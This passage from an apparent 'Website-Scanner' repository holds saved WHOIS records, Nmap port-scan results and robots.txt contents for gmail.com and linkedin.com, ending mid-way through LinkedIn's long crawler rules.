in this record is the date the 27 | registrar's sponsorship of the domain name registration in the registry is 28 | currently set to expire. This date does not necessarily reflect the expiration 29 | date of the domain name registrant's agreement with the sponsoring 30 | registrar. Users may consult the sponsoring registrar's Whois database to 31 | view the registrar's reported date of expiration for this registration. 32 | 33 | TERMS OF USE: You are not authorized to access or query our Whois 34 | database through the use of electronic processes that are high-volume and 35 | automated except as reasonably necessary to register domain names or 36 | modify existing registrations; the Data in VeriSign Global Registry 37 | Services' ("VeriSign") Whois database is provided by VeriSign for 38 | information purposes only, and to assist persons in obtaining information 39 | about or related to a domain name registration record. VeriSign does not 40 | guarantee its accuracy. By submitting a Whois query, you agree to abide 41 | by the following terms of use: You agree that you may use this Data only 42 | for lawful purposes and that under no circumstances will you use this Data 43 | to: (1) allow, enable, or otherwise support the transmission of mass 44 | unsolicited, commercial advertising or solicitations via e-mail, telephone, 45 | or facsimile; or (2) enable high volume, automated, electronic processes 46 | that apply to VeriSign (or its computer systems). The compilation, 47 | repackaging, dissemination or other use of this Data is expressly 48 | prohibited without the prior written consent of VeriSign. You agree not to 49 | use electronic processes that are automated and high-volume to access or 50 | query the Whois database except as reasonably necessary to register 51 | domain names or modify existing registrations. VeriSign reserves the right 52 | to restrict your access to the Whois database in its sole discretion to ensure 53 | operational stability. VeriSign may restrict or terminate your access to the 54 | Whois database for failure to abide by these terms of use. VeriSign 55 | reserves the right to modify these terms at any time. 56 | 57 | The Registry database contains ONLY .COM, .NET, .EDU domains and 58 | Registrars. 59 | -------------------------------------------------------------------------------- /Website-Scanner/websites/gmail/domain-name.txt: -------------------------------------------------------------------------------- 1 | gmail.com -------------------------------------------------------------------------------- /Website-Scanner/websites/gmail/full-url.txt: -------------------------------------------------------------------------------- 1 | https://gmail.com -------------------------------------------------------------------------------- /Website-Scanner/websites/gmail/nmap.txt: -------------------------------------------------------------------------------- 1 | 2 | Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-21 02:11 IST 3 | Nmap scan report for del03s07-in-f5.1e100.net (216.58.221.37) 4 | Host is up (0.018s latency). 5 | Not shown: 98 filtered ports 6 | PORT STATE SERVICE 7 | 80/tcp open http 8 | 443/tcp open https 9 | 10 | Nmap done: 1 IP address (1 host up) scanned in 1.91 seconds 11 | -------------------------------------------------------------------------------- /Website-Scanner/websites/gmail/robots-txt.txt: -------------------------------------------------------------------------------- 1 | User-agent: * 2 | Allow: / 3 | Disallow: /a/* 4 | Disallow: /mail?hl=* 5 | Disallow: /tasks/* 6 | 7 | Sitemap: https://www.google.com/gmail/sitemap.xml 8 | -------------------------------------------------------------------------------- /Website-Scanner/websites/gmail/whois.txt: -------------------------------------------------------------------------------- 1 | Domain Name: GMAIL.COM 2 | Registry Domain ID: 4667231_DOMAIN_COM-VRSN 3 | Registrar WHOIS Server: whois.markmonitor.com 4 | Registrar URL: http://www.markmonitor.com 5 | Updated Date: 2017-07-11T09:26:19Z 6 | Creation Date: 1995-08-13T04:00:00Z 7 | Registry Expiry Date: 2018-08-12T04:00:00Z 8 | Registrar: MarkMonitor Inc. 9 | Registrar IANA ID: 292 10 | Registrar Abuse Contact Email: abusecomplaints@markmonitor.com 11 | Registrar Abuse Contact Phone: +1.2083895740 12 | Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited 13 | Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited 14 | Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited 15 | Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited 16 | Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited 17 | Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited 18 | Name Server: NS1.GOOGLE.COM 19 | Name Server: NS2.GOOGLE.COM 20 | Name Server: NS3.GOOGLE.COM 21 | Name Server: NS4.GOOGLE.COM 22 | DNSSEC: unsigned 23 | URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ 24 | >>> Last update of whois database: 2017-10-20T20:41:20Z <<< 25 | 26 | For more information on Whois status codes, please visit https://icann.org/epp 27 | 28 | NOTICE: The expiration date displayed in this record is the date the 29 | registrar's sponsorship of the domain name registration in the registry is 30 | currently set to expire. This date does not necessarily reflect the expiration 31 | date of the domain name registrant's agreement with the sponsoring 32 | registrar. Users may consult the sponsoring registrar's Whois database to 33 | view the registrar's reported date of expiration for this registration. 34 | 35 | TERMS OF USE: You are not authorized to access or query our Whois 36 | database through the use of electronic processes that are high-volume and 37 | automated except as reasonably necessary to register domain names or 38 | modify existing registrations; the Data in VeriSign Global Registry 39 | Services' ("VeriSign") Whois database is provided by VeriSign for 40 | information purposes only, and to assist persons in obtaining information 41 | about or related to a domain name registration record. VeriSign does not 42 | guarantee its accuracy. By submitting a Whois query, you agree to abide 43 | by the following terms of use: You agree that you may use this Data only 44 | for lawful purposes and that under no circumstances will you use this Data 45 | to: (1) allow, enable, or otherwise support the transmission of mass 46 | unsolicited, commercial advertising or solicitations via e-mail, telephone, 47 | or facsimile; or (2) enable high volume, automated, electronic processes 48 | that apply to VeriSign (or its computer systems). The compilation, 49 | repackaging, dissemination or other use of this Data is expressly 50 | prohibited without the prior written consent of VeriSign. You agree not to 51 | use electronic processes that are automated and high-volume to access or 52 | query the Whois database except as reasonably necessary to register 53 | domain names or modify existing registrations. VeriSign reserves the right 54 | to restrict your access to the Whois database in its sole discretion to ensure 55 | operational stability. VeriSign may restrict or terminate your access to the 56 | Whois database for failure to abide by these terms of use. VeriSign 57 | reserves the right to modify these terms at any time. 58 | 59 | The Registry database contains ONLY .COM, .NET, .EDU domains and 60 | Registrars. 61 | -------------------------------------------------------------------------------- /Website-Scanner/websites/linkedin/domain-name.txt: -------------------------------------------------------------------------------- 1 | linkedin.com -------------------------------------------------------------------------------- /Website-Scanner/websites/linkedin/full-url.txt: -------------------------------------------------------------------------------- 1 | https://linkedin.com -------------------------------------------------------------------------------- /Website-Scanner/websites/linkedin/nmap.txt: -------------------------------------------------------------------------------- 1 | 2 | Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-21 02:11 IST 3 | Nmap scan report for 108-174-10-10.fwd.linkedin.com (108.174.10.10) 4 | Host is up (0.020s latency). 5 | Not shown: 99 filtered ports 6 | PORT STATE SERVICE 7 | 80/tcp open http 8 | 9 | Nmap done: 1 IP address (1 host up) scanned in 1.79 seconds 10 | -------------------------------------------------------------------------------- /Website-Scanner/websites/linkedin/robots-txt.txt: -------------------------------------------------------------------------------- 1 | # Notice: The use of robots or other automated means to access LinkedIn without 2 | # the express permission of LinkedIn is strictly prohibited. 3 | # See https://www.linkedin.com/legal/user-agreement. 4 | # LinkedIn may, in its discretion, permit certain automated access to certain LinkedIn pages, 5 | # for the limited purpose of including content in approved publicly available search engines. 6 | # If you would like to apply for permission to crawl LinkedIn, please email whitelistcrawl@linkedin.com. 7 | # Any and all permitted crawling of LinkedIn is subject to LinkedIn’s Crawling Terms and Conditions. 8 | # See http://www.linkedin.com/legal/crawling-terms. 9 | 10 | User-agent: Googlebot 11 | Disallow: /addContacts* 12 | Disallow: /addressBookExport* 13 | Disallow: /analytics/ 14 | Disallow: /answers* 15 | Disallow: /cap/ 16 | Disallow: /companyDir* 17 | Disallow: /connections* 18 | Disallow: /csp/ 19 | Disallow: /edurec* 20 | Disallow: /endorsements 21 | Disallow: /find/ 22 | Disallow: /groupAnswers* 23 | Disallow: /groupSharingMsg* 24 | Disallow: /inviteFromProfile* 25 | Disallow: /inviteMany* 26 | Disallow: /jobs?runSearch* 27 | Disallow: /jsearch* 28 | Disallow: /lite/ 29 | Disallow: /mbox* 30 | Disallow: /memberInvite* 31 | Disallow: /msgToConns* 32 | Disallow: /myprofile* 33 | Disallow: /network 34 | Disallow: /newsArticle* 35 | Disallow: /news?viewArticle* 36 | Disallow: /nus-trk* 37 | Disallow: /osview/ 38 | Disallow: /otherContacts 39 | Disallow: /people/iweReconnectAction 40 | Disallow: /ppl/ 41 | Disallow: /profile/ 42 | Disallow: /psettings/ 43 | Disallow: /reconnect* 44 | Disallow: /redirect* 45 | Disallow: /redir* 46 | Disallow: /requestList* 47 | Disallow: /search* 48 | Disallow: /secure/ 49 | Disallow: /settings/ 50 | Disallow: /shareArticle* 51 | Disallow: /signature* 52 | Disallow: /slink* 53 | Disallow: /svpRecommendations* 54 | Disallow: /uas/oauth/* 55 | Disallow: /using* 56 | Disallow: /help/*/ask 57 | Disallow: /help/*/ask/* 58 | Allow: /psettings/guest-controls* 59 | Allow: /psettings/guest-email-unsubscribe* 60 | Allow: /psettings/sms-unsubscribe* 61 | Allow: /psettings/guest-controls/retargeting-opt-out* 62 | Allow: /settings/loid-email-unsubscribe-router* 63 | Allow: /settings/loid-email-unsubscribe* 64 | Allow: /help/ 65 | 66 | User-agent: Applebot 67 | Disallow: /addContacts* 68 | Disallow: /addressBookExport* 69 | Disallow: /analytics/ 70 | Disallow: /answers* 71 | Disallow: /cap/ 72 | Disallow: /companyDir* 73 | Disallow: /connections* 74 | Disallow: /csp/ 75 | Disallow: /edurec* 76 | Disallow: /endorsements 77 | Disallow: /find/ 78 | Disallow: /groupAnswers* 79 | Disallow: /groupSharingMsg* 80 | Disallow: /inviteFromProfile* 81 | Disallow: /inviteMany* 82 | Disallow: /jobs?runSearch* 83 | Disallow: /jsearch* 84 | Disallow: /lite/ 85 | Disallow: /mbox* 86 | Disallow: /memberInvite* 87 | Disallow: /msgToConns* 88 | Disallow: /myprofile* 89 | Disallow: /network 90 | Disallow: /newsArticle* 91 | Disallow: /news?viewArticle* 92 | Disallow: /nus-trk* 93 | Disallow: /osview/ 94 | Disallow: /otherContacts 95 | Disallow: /people/iweReconnectAction 96 | Disallow: /ppl/ 97 | Disallow: /profile/ 98 | Disallow: /psettings/ 99 | Disallow: /reconnect* 100 | Disallow: /redirect* 101 | Disallow: /redir* 102 | Disallow: /requestList* 103 | Disallow: /search* 104 | Disallow: /secure/ 105 | Disallow: /settings/ 106 | Disallow: /shareArticle* 107 | Disallow: /signature* 108 | Disallow: /slink* 109 | Disallow: /svpRecommendations* 110 | Disallow: /uas/oauth/* 111 | Disallow: /using* 112 | Disallow: /help/*/ask 113 | Disallow: /help/*/ask/* 114 | Allow: /psettings/guest-controls* 115 | Allow: /psettings/guest-email-unsubscribe* 116 | Allow: /psettings/sms-unsubscribe* 117 | Allow: /psettings/guest-controls/retargeting-opt-out* 118 | Allow: /settings/loid-email-unsubscribe-router* 119 | Allow: /settings/loid-email-unsubscribe* 120 | Allow: /help/ 121 | 122 | User-agent: Bingbot 123 | Disallow: /addContacts* 124 | Disallow: /addressBookExport* 125 | Disallow: /analytics/ 126 | Disallow: /answers* 127 | Disallow: /cap/ 128 | Disallow: /companyDir* 129 | Disallow: /connections* 130 | Disallow: /csp/ 131 | Disallow: /edurec* 132 | Disallow: /endorsements 133 | Disallow: /find/ 134 | Disallow: /groupAnswers* 135 | Disallow: /groupSharingMsg* 136 | Disallow: /inviteFromProfile* 137 | Disallow: /inviteMany* 138 | Disallow: /jobs?runSearch* 139 | Disallow: /jsearch* 140 | Disallow: /lite/ 141 | Disallow: /mbox* 142 | Disallow: /memberInvite* 143 | Disallow: /msgToConns* 144 | Disallow: /myprofile* 145 | Disallow: /network 146 | Disallow: /newsArticle* 147 | Disallow: /news?viewArticle* 148 | Disallow: /nus-trk* 149 | Disallow: /osview/ 150 | Disallow: /otherContacts 151 | Disallow: /people/iweReconnectAction 152 | Disallow: /ppl/ 153 | Disallow: /profile/ 154 | Disallow: /psettings/ 155 | Disallow: /reconnect* 156 | Disallow: /redirect* 157 | Disallow: /redir* 158 | Disallow: /requestList* 159 | Disallow: /search* 160 | Disallow: /secure/ 161 | Disallow: /settings/ 162 | Disallow: /shareArticle* 163 | Disallow: /signature* 164 | Disallow: /slink* 165 | Disallow: /svpRecommendations* 166 | Disallow: /uas/oauth/* 167 | Disallow: /using* 168 | Disallow: /help/*/ask 169 | Disallow: /help/*/ask/* 170 | Allow: /help/ 171 | Allow: /psettings/guest-controls* 172 | Allow: /psettings/guest-email-unsubscribe* 173 | Allow: /psettings/sms-unsubscribe* 174 | Allow: /psettings/guest-controls/retargeting-opt-out* 175 | 176 | User-agent: msnbot 177 | Disallow: /addContacts* 178 | Disallow: /addressBookExport* 179 | Disallow: /analytics/ 180 | Disallow: /answers* 181 | Disallow: /cap/ 182 | Disallow: /companyDir* 183 | Disallow: /connections* 184 | Disallow: /csp/ 185 | Disallow: /edurec* 186 | Disallow: /endorsements 187 | Disallow: /find/ 188 | Disallow: /groupAnswers* 189 | Disallow: /groupSharingMsg* 190 | Disallow: /inviteFromProfile* 191 | Disallow: /inviteMany* 192 | Disallow: /jobs?runSearch* 193 | Disallow: /jsearch* 194 | Disallow: /lite/ 195 | Disallow: /mbox* 196 | Disallow: /memberInvite* 197 | Disallow: /msgToConns* 198 | Disallow: /myprofile* 199 | Disallow: /network 200 | Disallow: /newsArticle* 201 | Disallow: /news?viewArticle* 202 | Disallow: /nus-trk* 203 | Disallow: /osview/ 204 | Disallow: /otherContacts 205 | Disallow: /people/iweReconnectAction 206 | Disallow: /ppl/ 207 | Disallow: /profile/ 208 | Disallow: /psettings/ 209 | Disallow: /reconnect* 210 | Disallow: /redirect* 211 | Disallow: /redir* 212 | Disallow: /requestList* 213 | Disallow: /search* 214 | Disallow: /secure/ 215 | Disallow: /settings/ 216 | Disallow: /shareArticle* 217 | Disallow: /signature* 218 | Disallow: /slink* 219 | Disallow: /svpRecommendations* 220 | Disallow: /uas/oauth/* 221 | Disallow: /using* 222 | Disallow: /help/*/ask 223 | Disallow: /help/*/ask/* 224 | Allow: /help/ 225 | Allow: /psettings/guest-controls* 226 | Allow: /psettings/guest-email-unsubscribe* 227 | Allow: /psettings/sms-unsubscribe* 228 | Allow: /psettings/guest-controls/retargeting-opt-out* 229 | 230 | User-agent: Slurp 231 | Disallow: /addContacts* 232 | Disallow: /addressBookExport* 233 | Disallow: /analytics/ 234 | Disallow: /answers* 235 | Disallow: /cap/ 236 | Disallow: /companyDir* 237 | Disallow: /connections* 238 | Disallow: /csp/ 239 | Disallow: /edurec* 240 | Disallow: /endorsements 241 | Disallow: /find/ 242 | Disallow: /groupAnswers* 243 | Disallow: /groupSharingMsg* 244 | Disallow: /inviteFromProfile* 245 | Disallow: /inviteMany* 246 | Disallow: /jobs?runSearch* 247 | Disallow: /jsearch* 248 | Disallow: /lite/ 249 | Disallow: /mbox* 250 | Disallow: /memberInvite* 251 | Disallow: /msgToConns* 252 | Disallow: /myprofile* 253 | Disallow: /network 254 | Disallow: /newsArticle* 255 | Disallow: /news?viewArticle* 256 | Disallow: /nus-trk* 257 | Disallow: /osview/ 258 | Disallow: /otherContacts 259 | Disallow: /people/iweReconnectAction 260 | Disallow: /ppl/ 261 | Disallow: /profile/ 262 | Disallow: /psettings/ 263 | Disallow: /reconnect* 264 | Disallow: /redirect* 265 | Disallow: /redir* 266 | Disallow: /requestList* 267 | Disallow: /search* 268 | Disallow: /secure/ 269 | Disallow: /settings/ 270 | Disallow: /shareArticle* 271 | Disallow: /signature* 272 | Disallow: /slink* 273 | Disallow: /svpRecommendations* 274 | Disallow: /uas/oauth/* 275 | Disallow: /using* 276 | Disallow: /help/*/ask 277 | Disallow: /help/*/ask/* 278 | Allow: /help/ 279 | Allow: /psettings/guest-controls* 280 | Allow: /psettings/guest-email-unsubscribe* 281 | Allow: /psettings/sms-unsubscribe* 282 | Allow: /psettings/guest-controls/retargeting-opt-out* 283 | 284 | User-agent: Googlebot-Image 285 | Disallow: /addContacts* 286 | Disallow: /addressBookExport* 287 | Disallow: /analytics/ 288 | Disallow: /answers* 289 | Disallow: /cap/ 290 | Disallow: /companyDir* 291 | Disallow: /connections* 292 | Disallow: /csp/ 293 | Disallow: /edurec* 294 | Disallow: /endorsements 295 | Disallow: /find/ 296 | Disallow: /groupAnswers* 297 | Disallow: /groupSharingMsg* 298 | Disallow: /inviteFromProfile* 299 | Disallow: /inviteMany* 300 | Disallow: /jobs?runSearch* 301 | Disallow: /jsearch* 302 | Disallow: /lite/ 303 | Disallow: /mbox* 304 | Disallow: /memberInvite* 305 | Disallow: /msgToConns* 306 | Disallow: /myprofile* 307 | Disallow: /network 308 | Disallow: /newsArticle* 309 | Disallow: /news?viewArticle* 310 | Disallow: /nus-trk* 311 | Disallow: /osview/ 312 | Disallow: /otherContacts 313 | Disallow: /people/iweReconnectAction 314 | Disallow: /ppl/ 315 | Disallow: /profile/ 316 | Disallow: /psettings/ 317 | Disallow: /reconnect* 318 | Disallow: /redirect* 319 | Disallow: /redir* 320 | Disallow: /requestList* 321 | Disallow: /search* 322 | Disallow: /secure/ 323 | Disallow: /settings/ 324 | Disallow: /shareArticle* 325 | Disallow: /signature* 326 | Disallow: /slink* 327 | Disallow: /svpRecommendations* 328 | Disallow: /uas/oauth/* 329 | Disallow: /using* 330 | Disallow: /help/*/ask 331 | Disallow: /help/*/ask/* 332 | Allow: /help/ 333 | Allow: /psettings/guest-controls* 334 | Allow: /psettings/guest-email-unsubscribe* 335 | Allow: /psettings/sms-unsubscribe* 336 | Allow: /psettings/guest-controls/retargeting-opt-out* 337 | 338 | User-agent: baiduspider 339 | Disallow: /addContacts* 340 | Disallow: /addressBookExport* 341 | Disallow: /analytics/ 342 | Disallow: /answers* 343 | Disallow: /cap/ 344 | Disallow: /companyDir* 345 | Disallow: /connections* 346 | Disallow: /csp/ 347 | Disallow: /edurec* 348 | Disallow: /endorsements 349 | Disallow: /find/ 350 | Disallow: /groupAnswers* 351 | Disallow: /groupSharingMsg* 352 | Disallow: /inviteFromProfile* 353 | Disallow: /inviteMany* 354 | Disallow: /jobs?runSearch* 355 | Disallow: /jsearch* 356 | Disallow: /lite/ 357 | Disallow: /mbox* 358 | Disallow: /memberInvite* 359 | Disallow: /msgToConns* 360 | Disallow: /myprofile* 361 | Disallow: /network 362 | Disallow: /newsArticle* 363 | Disallow: /news?viewArticle* 364 | Disallow: /nus-trk* 365 | Disallow: /osview/ 366 | Disallow: /otherContacts 367 | Disallow: /people/iweReconnectAction 368 | Disallow: /ppl/ 369 | Disallow: /profile/ 370 | Disallow: /psettings/ 371 | Disallow: /reconnect* 372 | Disallow: /redirect* 373 | Disallow: /redir* 374 | Disallow: /requestList* 375 | Disallow: /search* 376 | Disallow: /secure/ 377 | Disallow: /settings/ 378 | Disallow: /shareArticle* 379 | Disallow: /signature* 380 | Disallow: /slink* 381 | Disallow: /svpRecommendations* 382 | Disallow: /uas/oauth/* 383 | Disallow: /using* 384 | Disallow: /help/*/ask 385 | Disallow: /help/*/ask/* 386 | Allow: /help/ 387 | Allow: /psettings/guest-controls* 388 | Allow: /psettings/guest-email-unsubscribe* 389 | Allow: /psettings/sms-unsubscribe* 390 | Allow: /psettings/guest-controls/retargeting-opt-out* 391 | 392 | User-agent: seznambot 393 | Disallow: /addContacts* 394 | Disallow: /addressBookExport* 395 | Disallow: /analytics/ 396 | Disallow: /answers* 397 | Disallow: /cap/ 398 | Disallow: /companyDir* 399 | Disallow: /connections* 400 | Disallow: /csp/ 401 | Disallow: /edurec* 402 | Disallow: /endorsements 403 | Disallow: /find/ 404 | Disallow: /groupAnswers* 405 | Disallow: /groupSharingMsg* 406 | Disallow: /inviteFromProfile* 407 | Disallow: /inviteMany* 408 | Disallow: /jobs?runSearch* 409 | Disallow: /jsearch* 410 | Disallow: /lite/ 411 | Disallow: /mbox* 412 | Disallow: /memberInvite* 413 | Disallow: /msgToConns* 414 | Disallow: /myprofile* 415 | Disallow: /network 416 | Disallow: /newsArticle* 417 | Disallow: /news?viewArticle* 418 | Disallow: /nus-trk* 419 | Disallow: /osview/ 420 | Disallow: /otherContacts 421 | Disallow: /people/iweReconnectAction 422 | Disallow: /ppl/ 423 | Disallow: /profile/ 424 | Disallow: /psettings/ 425 | Disallow: /reconnect* 426 | Disallow: /redirect* 427 | Disallow: /redir* 428 | Disallow: /requestList* 429 | Disallow: /search* 430 | Disallow: /secure/ 431 | Disallow: /settings/ 432 | Disallow: /shareArticle* 433 | Disallow: /signature* 434 | Disallow: /slink* 435 | Disallow: /svpRecommendations* 436 | Disallow: /uas/oauth/* 437 | Disallow: /using* 438 | Disallow: /help/*/ask 439 | Disallow: /help/*/ask/* 440 | Allow: /help/ 441 | Allow: /psettings/guest-controls* 442 | Allow: /psettings/guest-email-unsubscribe* 443 | Allow: /psettings/sms-unsubscribe* 444 | Allow: /psettings/guest-controls/retargeting-opt-out* 445 | 446 | User-agent: Teoma 447 | Disallow: /addContacts* 448 | Disallow: /addressBookExport* 449 | Disallow: /analytics/ 450 | Disallow: /answers* 451 | Disallow: /cap/ 452 | Disallow: /companyDir* 453 | Disallow: /connections* 454 | Disallow: /csp/ 455 | Disallow: /edurec* 456 | Disallow: /endorsements 457 | Disallow: /find/ 458 | Disallow: /groupAnswers* 459 | Disallow: /groupSharingMsg* 460 | Disallow: /inviteFromProfile* 461 | Disallow: /inviteMany* 462 | Disallow: /jobs?runSearch* 463 | Disallow: /jsearch* 464 | Disallow: /lite/ 465 | Disallow: /mbox* 466 | Disallow: /memberInvite* 467 | Disallow: /msgToConns* 468 | Disallow: /myprofile* 469 | Disallow: /network 470 | Disallow: /newsArticle* 471 | Disallow: /news?viewArticle* 472 | Disallow: /nus-trk* 473 | Disallow: /osview/ 474 | Disallow: /otherContacts 475 | Disallow: /people/iweReconnectAction 476 | Disallow: /ppl/ 477 | Disallow: /profile/ 478 | Disallow: /psettings/ 479 | Disallow: /reconnect* 480 | Disallow: /redirect* 481 | Disallow: /redir* 482 | Disallow: /requestList* 483 | Disallow: /search* 484 | Disallow: /secure/ 485 | Disallow: /settings/ 486 | Disallow: /shareArticle* 487 | Disallow: /signature* 488 | Disallow: /slink* 489 | Disallow: /svpRecommendations* 490 | Disallow: /uas/oauth/* 491 | Disallow: /using* 492 | Disallow: /help/*/ask 493 | Disallow: /help/*/ask/* 494 | Allow: /help/ 495 | Allow: /psettings/guest-controls* 496 | Allow: /psettings/guest-email-unsubscribe* 497 | Allow: /psettings/sms-unsubscribe* 498 | Allow: /psettings/guest-controls/retargeting-opt-out* 499 | 500 | User-agent: Yandex 501 | Disallow: /addContacts* 502 | Disallow: /addressBookExport* 503 | Disallow: /analytics/ 504 | Disallow: /answers* 505 | Disallow: /cap/ 506 | Disallow: /companyDir* 507 | Disallow: /connections* 508 | Disallow: /csp/ 509 | Disallow: /edurec* 510 | Disallow: /endorsements 511 | Disallow: /find/ 512 | Disallow: /groupAnswers* 513 | Disallow: /groupSharingMsg* 514 | Disallow: /inviteFromProfile* 515 | Disallow: /inviteMany* 516 | Disallow: /jobs?runSearch* 517 | Disallow: /jsearch* 518 | Disallow: /lite/ 519 | Disallow: /mbox* 520 | Disallow: /memberInvite* 521 | Disallow: /msgToConns* 522 | Disallow: /myprofile* 523 | Disallow: /network 524 | Disallow: /newsArticle* 525 | Disallow: /news?viewArticle* 526 | Disallow: /nus-trk* 527 | Disallow: /osview/ 528 | Disallow: /otherContacts 529 | Disallow: /people/iweReconnectAction 530 | Disallow: /ppl/ 531 | Disallow: /profile/ 532 | Disallow: /psettings/ 533 | Disallow: /reconnect* 534 | Disallow: /redirect* 535 | Disallow: /redir* 536 | Disallow: /requestList* 537 | Disallow: /search* 538 | Disallow: /secure/ 539 | Disallow: /settings/ 540 | Disallow: /shareArticle* 541 | Disallow: /signature* 542 | Disallow: /slink* 543 | Disallow: /svpRecommendations* 544 | Disallow: /uas/oauth/* 545 | Disallow: /using* 546 | Disallow: /help/*/ask 547 | Disallow: /help/*/ask/* 548 | Allow: /help/ 549 | Allow: /psettings/guest-controls* 550 | Allow: /psettings/guest-email-unsubscribe* 551 | Allow: /psettings/sms-unsubscribe* 552 | Allow: /psettings/guest-controls/retargeting-opt-out* 553 | 554 | User-agent: Yeti 555 | Disallow: /addContacts* 556 | Disallow: /addressBookExport* 557 | Disallow: /analytics/ 558 | Disallow: /answers* 559 | Disallow: /cap/ 560 | Disallow: /companyDir* 561 | Disallow: /connections* 562 | Disallow: /csp/ 563 | Disallow: /edurec* 564 | Disallow: /endorsements 565 | Disallow: /find/ 566 | Disallow: /groupAnswers* 567 | Disallow: /groupSharingMsg* 568 | Disallow: /inviteFromProfile* 569 | Disallow: /inviteMany* 570 | Disallow: /jobs?runSearch* 571 | Disallow: /jsearch* 572 | Disallow: /lite/ 573 | Disallow: /mbox* 574 | Disallow: /memberInvite* 575 | Disallow: /msgToConns* 576 | Disallow: /myprofile* 577 | Disallow: /network 578 | Disallow: /newsArticle* 579 | Disallow: /news?viewArticle* 580 | Disallow: /nus-trk* 581 | Disallow: /osview/ 582 | Disallow: /otherContacts 583 | Disallow: /people/iweReconnectAction 584 | Disallow: /ppl/ 585 | Disallow: /profile/ 586 | Disallow: /psettings/ 587 | Disallow: /reconnect* 588 | Disallow: /redirect* 589 | Disallow: /redir* 590 | Disallow: /requestList* 591 | Disallow: /search* 592 | Disallow: /secure/ 593 | Disallow: /settings/ 594 | Disallow: /shareArticle* 595 | Disallow: /signature* 596 | Disallow: /slink* 597 | Disallow: /svpRecommendations* 598 | Disallow: /uas/oauth/* 599 | Disallow: /using* 600 | Disallow: /help/*/ask 601 | Disallow: /help/*/ask/* 602 | Allow: /help/ 603 | Allow: /psettings/guest-controls* 604 | Allow: /psettings/guest-email-unsubscribe* 605 | Allow: /psettings/sms-unsubscribe* 606 | Allow: /psettings/guest-controls/retargeting-opt-out* 607 | 608 | User-agent: msnbot-media 609 | Disallow: /addContacts* 610 | Disallow: /addressBookExport* 611 | Disallow: /analytics/ 612 | Disallow: /answers* 613 | Disallow: /cap/ 614 | Disallow: /companyDir* 615 | Disallow: /connections* 616 | Disallow: /csp/ 617 | Disallow: /edurec* 618 | Disallow: /endorsements 619 | Disallow: /find/ 620 | Disallow: /groupAnswers* 621 | Disallow: /groupSharingMsg* 622 | Disallow: /inviteFromProfile* 623 | Disallow: /inviteMany* 624 | Disallow: /jobs?runSearch* 625 | Disallow: /jsearch* 626 | Disallow: /lite/ 627 | Disallow: /mbox* 628 | Disallow: /memberInvite* 629 | Disallow: /msgToConns* 630 | Disallow: /myprofile* 631 | Disallow: /network 632 | Disallow: /newsArticle* 633 | Disallow: /news?viewArticle* 634 | Disallow: /nus-trk* 635 | Disallow: /osview/ 636 | Disallow: /otherContacts 637 | Disallow: /people/iweReconnectAction 638 | Disallow: /ppl/ 639 | Disallow: /profile/ 640 | Disallow: /psettings/ 641 | Disallow: /reconnect* 642 | Disallow: /redirect* 643 | Disallow: /redir* 644 | Disallow: /requestList* 645 | Disallow: /search* 646 | Disallow: /secure/ 647 | Disallow: /settings/ 648 | Disallow: /shareArticle* 649 | Disallow: /signature* 650 | Disallow: /slink* 651 | Disallow: /svpRecommendations* 652 | Disallow: /uas/oauth/* 653 | Disallow: /using* 654 | Disallow: /help/*/ask 655 | Disallow: /help/*/ask/* 656 | Allow: /help/ 657 | Allow: /psettings/guest-controls* 658 | Allow: /psettings/guest-email-unsubscribe* 659 | Allow: /psettings/sms-unsubscribe* 660 | Allow: /psettings/guest-controls/retargeting-opt-out* 661 | 662 | User-agent: Googlebot-News 663 | Disallow: /addContacts* 664 | Disallow: /addressBookExport* 665 | Disallow: /analytics/ 666 | Disallow: /answers* 667 | Disallow: /cap/ 668 | Disallow: /companyDir* 669 | Disallow: /connections* 670 | Disallow: /csp/ 671 | Disallow: /edurec* 672 | Disallow: /endorsements 673 | Disallow: /find/ 674 | Disallow: /groupAnswers* 675 | Disallow: /groupSharingMsg* 676 | Disallow: /inviteFromProfile* 677 | Disallow: /inviteMany* 678 | Disallow: /jobs?runSearch* 679 | Disallow: /jsearch* 680 | Disallow: /lite/ 681 | Disallow: /mbox* 682 | Disallow: /memberInvite* 683 | Disallow: /msgToConns* 684 | Disallow: /myprofile* 685 | Disallow: /network 686 | Disallow: /newsArticle* 687 | Disallow: /news?viewArticle* 688 | Disallow: /nus-trk* 689 | Disallow: /osview/ 690 | Disallow: /otherContacts 691 | Disallow: /people/iweReconnectAction 692 | Disallow: /ppl/ 693 | Disallow: /profile/ 694 | Disallow: /psettings/ 695 | Disallow: /reconnect* 696 | Disallow: /redirect* 697 | Disallow: /redir* 698 | Disallow: /requestList* 699 | Disallow: /search* 700 | Disallow: /secure/ 701 | Disallow: /settings/ 702 | Disallow: /shareArticle* 703 | Disallow: /signature* 704 | Disallow: /slink* 705 | Disallow: /svpRecommendations* 706 | Disallow: /uas/oauth/* 707 | Disallow: /using* 708 | Disallow: /help/*/ask 709 | Disallow: /help/*/ask/* 710 | Allow: /help/ 711 | Allow: /psettings/guest-controls* 712 | Allow: /psettings/guest-email-unsubscribe* 713 | Allow: /psettings/sms-unsubscribe* 714 | Allow: /psettings/guest-controls/retargeting-opt-out* 715 | 716 | User-agent: Googlebot-Video 717 | Disallow: /addContacts* 718 | Disallow: /addressBookExport* 719 | Disallow: /analytics/ 720 | Disallow: /answers* 721 | Disallow: /cap/ 722 | Disallow: /companyDir* 723 | Disallow: /connections* 724 | Disallow: /csp/ 725 | Disallow: /edurec* 726 | Disallow: /endorsements 727 | Disallow: /find/ 728 | Disallow: /groupAnswers* 729 | Disallow: /groupSharingMsg* 730 | Disallow: /inviteFromProfile* 731 | Disallow: /inviteMany* 732 | Disallow: /jobs?runSearch* 733 | Disallow: /jsearch* 734 | Disallow: /lite/ 735 | Disallow: /mbox* 736 | Disallow: /memberInvite* 737 | Disallow: /msgToConns* 738 | Disallow: /myprofile* 739 | Disallow: /network 740 | Disallow: /newsArticle* 741 | Disallow: /news?viewArticle* 742 | Disallow: /nus-trk* 743 | Disallow: /osview/ 744 | Disallow: /otherContacts 745 | Disallow: /people/iweReconnectAction 746 | Disallow: /ppl/ 